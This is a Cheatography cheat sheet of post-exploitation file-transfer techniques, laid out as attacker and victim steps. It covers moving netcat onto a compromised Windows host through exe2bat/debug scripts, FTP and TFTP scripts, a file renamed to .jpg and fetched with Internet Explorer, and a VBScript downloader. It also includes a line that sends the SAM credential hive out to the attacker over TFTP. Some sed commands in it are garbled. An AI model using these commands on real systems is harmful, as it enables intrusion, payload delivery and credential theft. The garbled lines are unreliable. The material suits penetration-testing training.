Cheatography
https://cheatography.com
DEBUG.exeNote: Uploaded file cannot be larger than 64-bytes. UPX can be used to compress files.
locate exe2bat.exe
wine exe2bat.exe
upx -9 nc.exe (to compress nc.exe)
ls -l nc.exe (should now be smaller)
wine exe2bat.exe /root/nc.exe nc.txt (convert nc.exe to nc.txt)
cat nc.txt | more (should be a hex dump)
Near the end of nc.txt, exe2bat tells the debugger on the windows victim to create an exe
Gain your shell using your usual exploit then copy and paste the contents of nc.txt into the remote shell. If it fails, re-run any failed commands manually. nc.exe will now be created on the victim machine. |
PythonVictim
python -m SimpleHTTPServer
Attacker
Browse to victim from attacking machine for a directory listing |
FTP - WindowsConnect to an ftp server on port 80
ftp
open x.x.x.x 80
Connect using commands in config.txt
ftp -n -v -s:config.txt 10.2.10.14
config.txt:
user uid1234 (username)
uid1234 (password)
quit |
| | FTP UploadOutbound FTP is usually allowed in companies.
Kali
pure-pw useradd hacker -u ftpusers -d /ftphome/ (create user hacker)
pure-pw mkdb
cp /pentest/windows/nc.exe /ftphome
/etc/init.d/pure-ftpd start
ftp 127.0.0.1 (test login)
ls (nc.exe should appear)
bye
Victim (Windows)
After getting a shell:
echo open 192.168.34.10 > ftp.txt (commands to be run in the -s step)
echo myftp>> ftp.txt (no space between username and append command)
echo myftp>> ftp.txt
echo bin >> ftp.txt
echo get nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt (-s run commands in ftp.txt) |
FTP - Pure-FTPD/etc/init.d/pure-ftpd start (start ftp server)
netstat -antp (confirm server on port 21)
/etc/init.d/pure-ftpd stop (stop ftp server)
ls -l /ftphome (home ftp directory created by ftpd)
cp nc.exe /ftphome (copy netcat to ftphome)
ftp 127.0.0.1 (login ftp to server)
ls (netcat should appear)
bin (switch to binary for file transfer)
get nc.exe (confirm file transfer works)
bye
file nc.exe (confirm file properties are intact)
|
Internet ExplorerCan be good for bypassing Firewalls
mv nc.exe to nc.jpg (exe files will open a dialog, so they need to be converted)
./ability-linux (gain your remote shell)
cd prog*
cd internet*
start iexplore.exe http://192.168.8.173/nc.jpg` (nc.jpg will be downloaded to temp directory)
Navigate to the temporary internet files on the victim (e.g. c:\documents and settings\offsec\local settings\temporary internet files)
copy nc.jpg c:\
cd\
rename nc.jpg nc.exe
nc.exe (nc should be functional) |
| | down.vbs'Barabas pure vbs downloader - tested on XP sp2
'Microsoft fixed adodbstream but guess what :)
'(c)dec 2004
'First argument = complete url to download
'Second Argument = filename you want to save
'thnks to http://www.ericphelps.com/scripting/samples/BinaryDownload/
'
'v2 - now includes proxy support for the winhttp request stuff
strUrl = WScript.Arguments.Item(0)
StrFile = WScript.Arguments.Item(1)
'WinHttpRequest proxy settings.
Const HTTPREQUEST_PROXYSETTING_
DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 |
VBS Download (with down.vbs)cat down.vbs (confirm contents)
sed ’s/^echo /‘ download-vbscript (add echo to start of lines)
sed ’s/^echo /‘ download-vbscript | sed ’s/S/ >> down.vbs/‘ (add append to end of lines)
sed ’s/^echo /‘ download-vbscript | sed ’s/S/ >> down.vbs/‘ | grep -v ‘echo >> down.dbs’ (remove echo on blank lines)
/etc/init.d/apache2 start
cp nc.exe /var/www/
After getting a shell on your Victim:
Copy and paste the text output of the final sed command above and hit enter to create down.vbs.
cscript down.vbs http://192.168.8.173/nc.exe nc2.exe (to run down.vbs, which will download nc.exe to nc2.exe)
nc.exe (check if file is functional) |
| | TFTP ServerKali
apt-get install atftpd
atftpd --daemon --port 69 /tmp (start in daemon mode on port 69, home directory /tmp)
atftpd --daemon --port 1234 /tmp (start in daemon mode on port 1234, home directory /tmp)
netstat -anup | grep atftp (should be listening on port 69 udp)
cp /nc.exe /tmp
Downloading in Linux
tftp 127.0.0.1 (connect to server)
get nc.exe
quit
ls -l nc.exe
file nc.exe
Kill Server
ps -ef | grep atftp
kill -9 16084 (first column number)
netstat -anup | grep 69 (confirm server has been killed) |
TFTPNote: Most corporate firewalls will block outbound traffic rendering TFTP unusable. TFTP might not be on Windows machines. Files transferred will usually be read only. Change attrib of file to delete using attrib -r filename.
Download from Attacker
Kali
atftpd --daemon --port 69 /tmp
/usr/share/windows-binaries/nc.exe /tmp
chmod 777 /tmp/nc.exe
Windows
Initiate your remote shell to the Windows PC using your exploit:
./ability-linux.py (ability exploit, served, shell started)
`cd`
tftp -i 192.168.23.10 GET nc.exe (on Windows Victim, IP = Kali)
Upload to Attacker
tftp -i 192.168.8.172 PUT sam
sam should now appear in /tmp on the Kali machine
Download in Windows
tftp get 2.3.5.1:/lanscan (get the file lanscan from TFTP server 2.3.5.1) |
|
Help Us Go Positive!
We offset our carbon usage with Ecologi. Click the link below to help us!
Created By
Metadata
Favourited By
Comments
No comments yet. Add yours below!
Add a Comment
Related Cheat Sheets
More Cheat Sheets by fred